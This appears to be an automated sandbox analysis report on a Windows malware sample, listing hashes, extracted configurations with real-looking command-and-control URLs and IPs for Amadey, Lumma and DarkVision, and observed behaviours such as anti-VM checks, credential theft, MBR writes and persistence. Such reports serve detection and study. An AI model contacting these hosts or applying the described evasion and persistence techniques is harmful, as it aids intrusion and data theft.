Analysis
-
max time kernel
115s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
07/04/2025, 15:06
Static task
static1
Behavioral task
behavioral1
Sample
2025-04-07_a32bbde67b7cb766932759cdd6847e9c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-04-07_a32bbde67b7cb766932759cdd6847e9c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
a32bbde67b7cb766932759cdd6847e9c
-
SHA1
32539392a77364be4330ec9779cb484e8d277f89
-
SHA256
af256e3c17f143554b19ab2e9812837eb2122b1cdea55c58861ea1612404536a
-
SHA512
25463b8cda44304450fde60c74decdb6c038b20f10f072828172e06ae87a069a351c98909fd2ce3837bcf673791eb53495487e7dc9da28d2717584d49c7d9db1
-
SSDEEP
24576:tqDEvCTbMWu7rQYlBQcBiT6rprG8a0du:tTvC/MTQYxsWR7a0d
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://easyfwdr.digital/azxs
https://jjrxsafer.top/shpaoz
https://plantainklj.run/opafg
https://upuerrogfh.live/iqwez
https://quavabvc.top/iuzhd
https://furthert.run/azpp
https://targett.top/dsANGt
https://rambutanvcx.run/adioz
https://ywmedici.top/noagis
https://2travelilx.top/GSKAiz
https://jrxsafer.top/shpaoz
https://puerrogfh.live/iqwez
https://-furthert.run/azpp
https://xrfxcaseq.live/gspaz
https://gkrxspint.digital/kendwz
https://erhxhube.run/pogrs
https://grxeasyw.digital/xxepw
https://advennture.top/GKsiio
https://rodformi.run/aUosoz
https://metalsyo.digital/opsa
https://ironloxp.live/aksdd
https://navstarx.shop/FoaJSi
https://wstarcloc.bet/GOksAo
https://atargett.top/dsANGt
https://spacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
Extracted
darkvision
82.29.67.160
-
url
http://107.174.192.179/data/003
https://grabify.link/ZATFQO
http://107.174.192.179/clean
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Signatures
-
Amadey family
-
Asyncrat family
-
DarkVision Rat
DarkVision Rat is a trojan written in C++.
-
Darkvision family
-
Lumma family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral1/memory/7556-22898-0x0000000000400000-0x000000000073C000-memory.dmp family_stormkitty -
Stormkitty family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempLSUCRWKTHK44SOFCEHQXJG8G3AGREXFK.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ dfbccbcf79.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 19 2116 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2116 powershell.exe 2748 powershell.exe -
Downloads MZ/PE file 12 IoCs
flow pid Process 19 2116 powershell.exe 219 6672 MSBuild.exe 33 4472 rapes.exe 33 4472 rapes.exe 33 4472 rapes.exe 33 4472 rapes.exe 33 4472 rapes.exe 33 4472 rapes.exe 33 4472 rapes.exe 95 4324 svchost.exe 182 6672 MSBuild.exe 234 6672 MSBuild.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\System32\Drivers\6bbb4d94.sys af476d2b.exe File created C:\Windows\System32\Drivers\klupd_6bbb4d94a_arkmon.sys af476d2b.exe File created C:\Windows\System32\Drivers\klupd_6bbb4d94a_klbg.sys af476d2b.exe -
Sets service image path in registry 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_6bbb4d94a_klbg\ImagePath = "System32\\Drivers\\klupd_6bbb4d94a_klbg.sys" af476d2b.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_6bbb4d94a_klark\ImagePath = "System32\\Drivers\\klupd_6bbb4d94a_klark.sys" af476d2b.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_6bbb4d94a_mark\ImagePath = "System32\\Drivers\\klupd_6bbb4d94a_mark.sys" af476d2b.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_6bbb4d94a_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_6bbb4d94a_arkmon.sys" af476d2b.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\d5ILz1af_5032\ImagePath = "\\??\\C:\\Windows\\Temp\\d5ILz1af_5032.sys" tzutil.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\6bbb4d94\ImagePath = "System32\\Drivers\\6bbb4d94.sys" af476d2b.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_6bbb4d94a_arkmon\ImagePath = "System32\\Drivers\\klupd_6bbb4d94a_arkmon.sys" af476d2b.exe -
Uses browser remote debugging 2 TTPs 10 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 5060 msedge.exe 2064 msedge.exe 4852 msedge.exe 8468 chrome.exe 8756 chrome.exe 9056 chrome.exe 5920 msedge.exe 13156 msedge.exe 7320 chrome.exe 8456 chrome.exe -
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempLSUCRWKTHK44SOFCEHQXJG8G3AGREXFK.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempLSUCRWKTHK44SOFCEHQXJG8G3AGREXFK.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dfbccbcf79.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dfbccbcf79.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation TempLSUCRWKTHK44SOFCEHQXJG8G3AGREXFK.EXE Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation rapes.exe -
Deletes itself 1 IoCs
pid Process 4760 w32tm.exe -
Executes dropped EXE 19 IoCs
pid Process 4572 TempLSUCRWKTHK44SOFCEHQXJG8G3AGREXFK.EXE 4472 rapes.exe 2556 NlmvJyQ.exe 2324 Nehh6wZ.exe 4376 qhjMWht.exe 4088 AfkeY2q.exe 3992 dfbccbcf79.exe 1360 UZPt0hR.exe 5032 tzutil.exe 4760 w32tm.exe 6252 rapes.exe 6496 ibC8xs1.exe 7124 exp.exe 7488 v1BRaoR.exe 7840 5feb513d.exe 8324 Rm3cVPI.exe 9288 af476d2b.exe 5764 9sWdA2p.exe 9876 larBxd7.exe -
Identifies Wine through registry keys 2 TTPs 4 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine TempLSUCRWKTHK44SOFCEHQXJG8G3AGREXFK.EXE Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine dfbccbcf79.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine rapes.exe -
Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\6bbb4d94.sys af476d2b.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\6bbb4d94.sys\ = "Driver" af476d2b.exe -
Loads dropped DLL 25 IoCs
pid Process 9288 af476d2b.exe 9288 af476d2b.exe 9288 af476d2b.exe 9288 af476d2b.exe 9288 af476d2b.exe 9288 af476d2b.exe 9288 af476d2b.exe 9288 af476d2b.exe 9288 af476d2b.exe 9288 af476d2b.exe 9288 af476d2b.exe 9288 af476d2b.exe 9288 af476d2b.exe 9288 af476d2b.exe 9288 af476d2b.exe 9288 af476d2b.exe 9288 af476d2b.exe 9288 af476d2b.exe 9288 af476d2b.exe 9288 af476d2b.exe 9288 af476d2b.exe 9288 af476d2b.exe 9288 af476d2b.exe 9288 af476d2b.exe 9288 af476d2b.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts MSBuild.exe -
Accesses Microsoft Outlook profiles 1 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook MSBuild.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\76f59edd-a3bd-47c6-8a0c-ade88a265eeb = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{80a6697a-7dc0-420f-a9c6-a7cdfa99c001}\\76f59edd-a3bd-47c6-8a0c-ade88a265eeb.cmd\"" af476d2b.exe Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Shell = "explorer.exe C:\\Users\\Admin\\AppData\\Roaming\\blv20gPs\\exp.exe" ibC8xs1.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: af476d2b.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 57 raw.githubusercontent.com 56 raw.githubusercontent.com -
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 dfbccbcf79.exe File opened for modification \??\PhysicalDrive0 af476d2b.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 4572 TempLSUCRWKTHK44SOFCEHQXJG8G3AGREXFK.EXE 4472 rapes.exe 3992 dfbccbcf79.exe 6252 rapes.exe -
Suspicious use of SetThreadContext 9 IoCs
description pid Process procid_target PID 2556 set thread context of 4124 2556 NlmvJyQ.exe 107 PID 2324 set thread context of 1664 2324 Nehh6wZ.exe 109 PID 4088 set thread context of 2492 4088 AfkeY2q.exe 114 PID 6496 set thread context of 6672 6496 ibC8xs1.exe 141 PID 7124 set thread context of 5288 7124 exp.exe 154 PID 7488 set thread context of 7556 7488 v1BRaoR.exe 156 PID 6672 set thread context of 8108 6672 MSBuild.exe 159 PID 6672 set thread context of 10588 6672 MSBuild.exe 175 PID 6672 set thread context of 7264 6672 MSBuild.exe 209 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN 5feb513d.exe File opened (read-only) \??\VBoxMiniRdrDN af476d2b.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe MSBuild.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempLSUCRWKTHK44SOFCEHQXJG8G3AGREXFK.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 8384 7556 WerFault.exe 156 -
System Location Discovery: System Language Discovery 1 TTPs 22 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-04-07_a32bbde67b7cb766932759cdd6847e9c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5feb513d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language af476d2b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempLSUCRWKTHK44SOFCEHQXJG8G3AGREXFK.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UZPt0hR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qhjMWht.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dfbccbcf79.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AfkeY2q.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rm3cVPI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9sWdA2p.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language larBxd7.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 64 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 8440 PING.EXE 11920 PING.EXE 10496 PING.EXE 1784 PING.EXE 5404 PING.EXE 6480 PING.EXE 6092 PING.EXE 10996 PING.EXE 11288 PING.EXE 11452 PING.EXE 5896 PING.EXE 10440 PING.EXE 8724 PING.EXE 7336 PING.EXE 6132 PING.EXE 10180 PING.EXE 11936 PING.EXE 8420 PING.EXE 4940 PING.EXE 11120 PING.EXE 7708 PING.EXE 540 PING.EXE 1620 PING.EXE 10268 PING.EXE 13268 PING.EXE 7132 PING.EXE 5276 PING.EXE 7888 PING.EXE 10580 PING.EXE 6328 PING.EXE 7160 PING.EXE 11840 PING.EXE 12476 PING.EXE 7628 PING.EXE 8124 PING.EXE 5468 PING.EXE 4612 PING.EXE 11460 PING.EXE 11736 PING.EXE 7616 PING.EXE 5564 PING.EXE 8772 PING.EXE 4512 PING.EXE 5272 PING.EXE 8452 PING.EXE 10276 PING.EXE 5276 PING.EXE 6000 PING.EXE 10608 PING.EXE 8104 PING.EXE 8256 PING.EXE 11096 PING.EXE 7244 PING.EXE 8584 PING.EXE 2508 PING.EXE 11176 PING.EXE 7112 PING.EXE 8472 PING.EXE 10004 PING.EXE 11784 PING.EXE 10772 PING.EXE 10296 PING.EXE 5680 PING.EXE 5756 PING.EXE -
Checks processor information in registry 2 TTPs 21 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz MSBuild.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision MSBuild.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000_Classes\Local Settings rundll32.exe -
Runs ping.exe 1 TTPs 64 IoCs
pid Process 7628 PING.EXE 8952 PING.EXE 6336 PING.EXE 11628 PING.EXE 12172 PING.EXE 7604 PING.EXE 10440 PING.EXE 8340 PING.EXE 11556 PING.EXE 4376 PING.EXE 5564 PING.EXE 9424 PING.EXE 5024 PING.EXE 7500 PING.EXE 7160 PING.EXE 5468 PING.EXE 860 PING.EXE 7100 PING.EXE 10304 PING.EXE 8772 PING.EXE 12596 PING.EXE 10348 PING.EXE 9900 PING.EXE 6328 PING.EXE 7808 PING.EXE 3688 PING.EXE 10544 PING.EXE 6976 PING.EXE 7888 PING.EXE 9932 PING.EXE 11588 PING.EXE 5384 PING.EXE 11364 PING.EXE 10916 PING.EXE 1476 PING.EXE 8256 PING.EXE 8156 PING.EXE 13056 PING.EXE 5952 PING.EXE 12700 PING.EXE 10468 PING.EXE 8452 PING.EXE 13016 PING.EXE 11640 PING.EXE 3840 PING.EXE 10004 PING.EXE 5276 PING.EXE 8696 PING.EXE 6704 PING.EXE 5272 PING.EXE 8220 PING.EXE 8276 PING.EXE 11108 PING.EXE 12272 PING.EXE 13268 PING.EXE 4212 PING.EXE 4808 PING.EXE 6092 PING.EXE 10252 PING.EXE 10496 PING.EXE 11536 PING.EXE 5896 PING.EXE 4548 PING.EXE 9716 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2164 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 6672 MSBuild.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2116 powershell.exe 2116 powershell.exe 4572 TempLSUCRWKTHK44SOFCEHQXJG8G3AGREXFK.EXE 4572 TempLSUCRWKTHK44SOFCEHQXJG8G3AGREXFK.EXE 4472 rapes.exe 4472 rapes.exe 4124 MSBuild.exe 4124 MSBuild.exe 4124 MSBuild.exe 4124 MSBuild.exe 1664 MSBuild.exe 1664 MSBuild.exe 1664 MSBuild.exe 1664 MSBuild.exe 4376 qhjMWht.exe 4376 qhjMWht.exe 4376 qhjMWht.exe 4376 qhjMWht.exe 4376 qhjMWht.exe 4376 qhjMWht.exe 3992 dfbccbcf79.exe 3992 dfbccbcf79.exe 2748 powershell.exe 2748 powershell.exe 2748 powershell.exe 13104 powershell.exe 13104 powershell.exe 13104 powershell.exe 6252 rapes.exe 6252 rapes.exe 7124 exp.exe 7124 exp.exe 7124 exp.exe 7124 exp.exe 7124 exp.exe 7124 exp.exe 6672 MSBuild.exe 6672 MSBuild.exe 6672 MSBuild.exe 6672 MSBuild.exe 6672 MSBuild.exe 6672 MSBuild.exe 6672 MSBuild.exe 6672 MSBuild.exe 6672 MSBuild.exe 6672 MSBuild.exe 6672 MSBuild.exe 6672 MSBuild.exe 6672 MSBuild.exe 6672 MSBuild.exe 6672 MSBuild.exe 6672 MSBuild.exe 6672 MSBuild.exe 6672 MSBuild.exe 6672 MSBuild.exe 6672 MSBuild.exe 6672 MSBuild.exe 6672 MSBuild.exe 6672 MSBuild.exe 6672 MSBuild.exe 6672 MSBuild.exe 6672 MSBuild.exe 6672 MSBuild.exe 6672 MSBuild.exe -
Suspicious behavior: LoadsDriver 5 IoCs
pid Process 5032 tzutil.exe 9288 af476d2b.exe 9288 af476d2b.exe 9288 af476d2b.exe 9288 af476d2b.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 1360 UZPt0hR.exe 1360 UZPt0hR.exe 1360 UZPt0hR.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
pid Process 7320 chrome.exe 7320 chrome.exe 7320 chrome.exe 7320 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2116 powershell.exe Token: SeDebugPrivilege 2492 MSBuild.exe Token: SeDebugPrivilege 2748 powershell.exe Token: SeLoadDriverPrivilege 5032 tzutil.exe Token: SeDebugPrivilege 13104 powershell.exe Token: SeDebugPrivilege 6496 ibC8xs1.exe Token: SeDebugPrivilege 7124 exp.exe Token: SeDebugPrivilege 6672 MSBuild.exe Token: SeDebugPrivilege 6672 MSBuild.exe Token: SeDebugPrivilege 6672 MSBuild.exe Token: SeDebugPrivilege 6672 MSBuild.exe Token: SeDebugPrivilege 6672 MSBuild.exe Token: SeDebugPrivilege 6672 MSBuild.exe Token: SeDebugPrivilege 6672 MSBuild.exe Token: SeDebugPrivilege 6672 MSBuild.exe Token: SeDebugPrivilege 6672 MSBuild.exe Token: SeDebugPrivilege 6672 MSBuild.exe Token: SeDebugPrivilege 6672 MSBuild.exe Token: SeDebugPrivilege 6672 MSBuild.exe Token: SeDebugPrivilege 6672 MSBuild.exe Token: SeDebugPrivilege 6672 MSBuild.exe Token: SeDebugPrivilege 6672 MSBuild.exe Token: SeDebugPrivilege 6672 MSBuild.exe Token: SeDebugPrivilege 6672 MSBuild.exe Token: SeDebugPrivilege 6672 MSBuild.exe Token: SeDebugPrivilege 6672 MSBuild.exe Token: SeDebugPrivilege 6672 MSBuild.exe Token: SeDebugPrivilege 6672 MSBuild.exe Token: SeDebugPrivilege 7556 MSBuild.exe Token: SeIncreaseQuotaPrivilege 7556 MSBuild.exe Token: SeSecurityPrivilege 7556 MSBuild.exe Token: SeTakeOwnershipPrivilege 7556 MSBuild.exe Token: SeLoadDriverPrivilege 7556 MSBuild.exe Token: SeSystemProfilePrivilege 7556 MSBuild.exe Token: SeSystemtimePrivilege 7556 MSBuild.exe Token: SeProfSingleProcessPrivilege 7556 MSBuild.exe Token: SeIncBasePriorityPrivilege 7556 MSBuild.exe Token: SeCreatePagefilePrivilege 7556 MSBuild.exe Token: SeBackupPrivilege 7556 MSBuild.exe Token: SeRestorePrivilege 7556 MSBuild.exe Token: SeShutdownPrivilege 7556 MSBuild.exe Token: SeDebugPrivilege 7556 MSBuild.exe Token: SeSystemEnvironmentPrivilege 7556 MSBuild.exe Token: SeRemoteShutdownPrivilege 7556 MSBuild.exe Token: SeUndockPrivilege 7556 MSBuild.exe Token: SeManageVolumePrivilege 7556 MSBuild.exe Token: 33 7556 MSBuild.exe Token: 34 7556 MSBuild.exe Token: 35 7556 MSBuild.exe Token: 36 7556 MSBuild.exe Token: SeIncreaseQuotaPrivilege 7556 MSBuild.exe Token: SeSecurityPrivilege 7556 MSBuild.exe Token: SeTakeOwnershipPrivilege 7556 MSBuild.exe Token: SeLoadDriverPrivilege 7556 MSBuild.exe Token: SeSystemProfilePrivilege 7556 MSBuild.exe Token: SeSystemtimePrivilege 7556 MSBuild.exe Token: SeProfSingleProcessPrivilege 7556 MSBuild.exe Token: SeIncBasePriorityPrivilege 7556 MSBuild.exe Token: SeCreatePagefilePrivilege 7556 MSBuild.exe Token: SeBackupPrivilege 7556 MSBuild.exe Token: SeRestorePrivilege 7556 MSBuild.exe Token: SeShutdownPrivilege 7556 MSBuild.exe Token: SeDebugPrivilege 7556 MSBuild.exe Token: SeSystemEnvironmentPrivilege 7556 MSBuild.exe -
Suspicious use of FindShellTrayWindow 8 IoCs
pid Process 5040 2025-04-07_a32bbde67b7cb766932759cdd6847e9c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 5040 2025-04-07_a32bbde67b7cb766932759cdd6847e9c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 5040 2025-04-07_a32bbde67b7cb766932759cdd6847e9c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 8108 rundll32.exe 10588 rundll32.exe 6672 MSBuild.exe 7264 rundll32.exe 7320 chrome.exe -
Suspicious use of SendNotifyMessage 3 IoCs
